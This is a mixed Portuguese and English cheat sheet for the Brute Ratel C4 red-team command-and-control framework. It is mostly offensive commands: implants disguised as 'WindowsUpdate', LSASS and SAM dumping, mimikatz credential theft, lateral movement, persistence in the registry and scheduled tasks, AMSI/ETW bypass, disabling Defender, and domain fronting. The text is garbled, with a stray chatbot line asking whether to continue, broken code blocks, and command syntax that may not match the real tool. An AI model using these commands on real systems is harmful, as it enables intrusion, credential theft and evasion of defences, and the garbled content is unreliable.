Folha de Referência do Framework Brute Ratel C4
Visão Geral
Brute Ratel C4 (BRc4) é um framework comercial personalizado de Comando e Controle (C2) projetado para operações de red team e simulações de adversários. Ele fornece recursos avançados de evasão, recursos sofisticados de pós-exploração e segurança operacional de nível profissional.
⚠️ Aviso: Esta é uma ferramenta comercial que requer uma licença válida. Esta ferramenta destina-se apenas a testes de penetração autorizados e exercícios de red team. Certifique-se de ter autorização adequada antes de usar em qualquer ambiente.
Instalação
Ativação de Licença
# Activate license (requires valid license key)
./brc4 --activate <license-key>
# Verify license status
./brc4 --license-info
# Update license
./brc4 --update-licenseConfiguração do Servidor
# Start BRc4 server
./brc4 --server
# Start with custom configuration
./brc4 --server --config /path/to/config.json
# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443Conexão do Cliente
# Connect to server
./brc4 --client --server 192.168.1.100:443
# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>Referência de Comandos
Gerenciamento de Servidor
| Comando | Descrição |
|---|---|
help | Exibir menu de ajuda |
version | Mostrar informações da versão |
listeners | Listar listeners ativos |
badgers | Lista de badgers conectados (agentes) |
operators | Lista de operadores conectados |
exit | Sair do servidor BRc4 |
Gerenciamento de Listener
| Comando | Descrição |
|---|---|
listener http | Criar listener HTTP |
listener https | Criar listener HTTPS |
listener dns | Criar listener de DNS |
listener tcp | Criar ouvinte TCP |
listener smb | Criar listener SMB |
listener stop <id> | Parar listener |
Gerenciamento de Badger (Agente)
| Comando | Descrição |
|---|---|
badger <id> | Interagir com badger |
badger kill <id> | Matar texugo |
badger sleep <time> | Definir intervalo de sono |
badger jitter <percentage> | Definir porcentagem de jitter |
badger proxy <proxy> | Definir proxy para badger |
Configuração de Listener
Listeners HTTP/HTTPS
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start
# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
startListener DNS
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
startListener SMB
# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
startListener TCP
# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
startGeração de Badger
Badgers Windows
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate
# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate
# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generateBadgers Linux
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate
# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generateBadgers macOS
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate
# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generateComandos de Pós-Exploração
Informações do Sistema
# Get system information
sysinfo
# Get current user
whoami
# Get privileges
getprivs
# Get environment variables
env
# Get network interfaces
ifconfigOperações de Arquivo
# List directory
ls /path/to/directory
# Change directory
cd /path/to/directory
# Download file
download /remote/path/file.txt
# Upload file
upload /local/path/file.txt /remote/path/
# Execute file
execute /path/to/executable
# Delete file
rm /path/to/fileGerenciamento de Processos
# List processes
ps
# Kill process
kill <pid>
# Migrate to process
migrate <pid>
# Inject into process
inject <pid> <payload>
# Create process
spawn <executable>Operações de Rede
# Network connections
netstat
# ARP table
arp
# Routing table
route
# Port scan
portscan 192.168.1.0/24 80,443,3389
# Ping sweep
ping 192.168.1.0/24Recursos Avançados
Perfis C2 Maleáveis
# Load malleable profile
set malleable /path/to/profile.profile
# Custom HTTP profile
http-get \\\\{
set uri "/api/v1/status";
client \\\\{
header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
header "Accept" "application/json";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}Técnicas de Injeção de Processo
Would you like me to continue with the remaining sections?```bash
Classic DLL injection
inject-dll
Process hollowing
hollow
Reflective DLL loading
reflective-dll /path/to/dll.dll
Manual DLL mapping
map-dll
Thread hijacking
hijack-thread
### Credential Harvesting
```bash
# Dump LSASS
lsass-dump
# Mimikatz integration
mimikatz sekurlsa::logonpasswords
# SAM dump
sam-dump
# LSA secrets
lsa-secrets
# Cached credentials
cache-dump
# Browser credentials
browser-credsLateral Movement
# WMI execution
wmi-exec 192.168.1.10 "whoami"
# PSExec
psexec 192.168.1.10 "whoami"
# SMB execution
smb-exec 192.168.1.10 "whoami"
# DCOM execution
dcom-exec 192.168.1.10 "whoami"
# WinRM execution
winrm-exec 192.168.1.10 "whoami"Persistence Mechanisms
# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"
# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily
# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"
# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"
# Startup folder
persist-startup "C:\temp\badger.exe"Evasion Techniques
Anti-Analysis
# VM detection
vm-detect
# Sandbox evasion
sandbox-evasion
# Debugger detection
debugger-detect
# Sleep evasion
sleep-evasion 300
# User interaction check
user-interactionAMSI/ETW Bypass
# AMSI bypass
amsi-bypass
# ETW bypass
etw-bypass
# Disable Windows Defender
disable-defender
# Unhook DLLs
unhook-dlls
# Patch AMSI
patch-amsiTraffic Obfuscation
# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com
# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"
# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"Payload Obfuscation
# Encrypt payload
encrypt-payload aes256 <key>
# Obfuscate strings
obfuscate-strings
# Pack executable
pack-exe upx
# Sign executable
sign-exe /path/to/cert.pfx
# Polymorphic generation
polymorphic-genOperational Security
Communication Security
# Use encrypted channels
set encryption aes256
# Certificate pinning
set cert-pinning true
# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384
# Jitter configuration
set jitter 20
set jitter-type randomInfrastructure Management
# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443
# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"
# Failover configuration
set failover-servers "backup1.com,backup2.com"Logging and Monitoring
# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log
# Operator tracking
set operator-logging true
# Command auditing
set command-audit true
# Session recording
set session-recording trueTeam Operations
Multi-Operator Support
# Add operator
operator add username password
# Set operator permissions
operator permissions username read,write,execute
# Operator sessions
operator sessions
# Kick operator
operator kick usernameCollaboration Features
# Share badger session
share-session <badger-id> <operator>
# Session notes
note-add "Important finding"
note-list
note-delete <note-id>
# Team chat
chat "Message to team"
chat-historyTroubleshooting
Connection Issues
# Test listener
test-listener <listener-id>
# Check connectivity
test-connectivity <target>
# Verify certificates
verify-cert /path/to/cert.pem
# Debug mode
set debug trueBadger Issues
# Badger health check
health-check <badger-id>
# Reset badger
reset-badger <badger-id>
# Badger diagnostics
diagnostics <badger-id>
# Force reconnect
reconnect <badger-id>Performance Optimization
# Optimize sleep intervals
set sleep-optimization true
# Bandwidth throttling
set bandwidth-limit 1024
# Connection pooling
set connection-pooling true
# Compression
set compression gzipConfiguration
Server Configuration
\\\\{
"server": \\\\{
"host": "0.0.0.0",
"port": 443,
"ssl": true,
"cert": "/path/to/cert.pem",
"key": "/path/to/key.pem"
\\\\},
"database": \\\\{
"type": "sqlite",
"path": "/opt/brc4/database.db"
\\\\},
"logging": \\\\{
"level": "info",
"file": "/var/log/brc4.log"
\\\\}
\\\\}Malleable Profile
# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
http-get \\\\{
set uri "/api/status";
client \\\\{
header "Accept" "application/json";
header "Accept-Language" "en-US,en;q=0.9";
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
print;
\\\\}
\\\\}
\\\\}Resources
Este guia de referência fornece uma referência abrangente para o uso do Brute Ratel C4. Esta é uma ferramenta comercial que requer licenciamento adequado. Sempre certifique-se de ter autorização adequada antes de usar esta ferramenta em qualquer ambiente.